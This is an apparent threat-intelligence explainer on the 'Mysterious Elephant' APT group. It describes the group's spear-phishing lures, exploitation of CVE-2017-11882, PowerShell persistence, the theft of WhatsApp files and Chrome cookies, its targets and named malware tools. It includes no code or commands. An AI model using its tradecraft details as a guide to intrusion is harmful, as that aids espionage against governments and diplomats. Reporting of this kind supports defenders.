Who are elephant Hackers?

Mysterious Elephant is an advanced persistent threat (APT) hacking group that Kaspersky researchers first identified in 2023, with activities continuing to evolve through 2025. The group is notable for repurposing and enhancing malware originally developed by other APT actors, such as Origami Elephant, Confucius, and SideWinder, rather than creating entirely new tools from scratch. They operate primarily as cyber espionage actors, focusing on infiltrating networks to steal sensitive information.

Key Activities

•  Initial Access: They often use spear-phishing emails with tailored lures, such as documents mimicking diplomatic correspondence (e.g., related to Pakistan’s UN Security Council bid) or Hajj-themed baits. These emails exploit vulnerabilities like CVE-2017-11882 or deliver malicious attachments via remote template injection.

•  Persistence and Execution: Once inside, they deploy PowerShell scripts for command execution, payload downloads (using tools like curl and certutil), and persistence mechanisms, such as scheduled tasks triggered by network changes to avoid detection.

•  Lateral Movement and Exfiltration: The group escalates privileges, moves laterally across networks, and extracts data, with a particular emphasis on stealing files from WhatsApp (e.g., shared transfers) and Chrome browsers (e.g., cookies and tokens).

Targets

Their campaigns predominantly target government entities and diplomatic institutions in the Asia-Pacific region, including:

•  Pakistan (heavy focus on foreign affairs and diplomatic sectors)

•  Bangladesh, Afghanistan, Nepal, and Sri Lanka Attacks are highly targeted, with customized payloads for specific individuals or organizations.

Tools and Tactics

Mysterious Elephant employs a modular toolkit blending custom and modified open-source components:

•  Downloaders and Loaders: Vtyrei (an early downloader), MemLoader HidenDesk (reflective PE loader with RC4 decryption for Remcos RAT, sandbox evasion via process checks and hidden desktops), MemLoader Edge (XOR-decrypted PE loader with connectivity tests to bing.com).

•  Backdoors and Shells: BabShell (C++ reverse shell for system reconnaissance and command execution).

•  Exfiltration Tools: Uplo Exfiltrator and Stom Exfiltrator (for WhatsApp files, using XOR/Base64 and depth-first searches), ChromeStealer Exfiltrator (for browser data).

•  Infrastructure: They leverage VPS/cloud services with wildcard DNS domains for command-and-control (C2) servers, favoring providers that allow quick scaling and evasion.

The group’s tactics show sophistication in evasion, such as delayed executions and themed baits tied to current events, making them a growing threat to regional diplomatic security. As of late 2025, no definitive attribution to a nation-state has been publicly confirmed, though their focus suggests state-sponsored motives.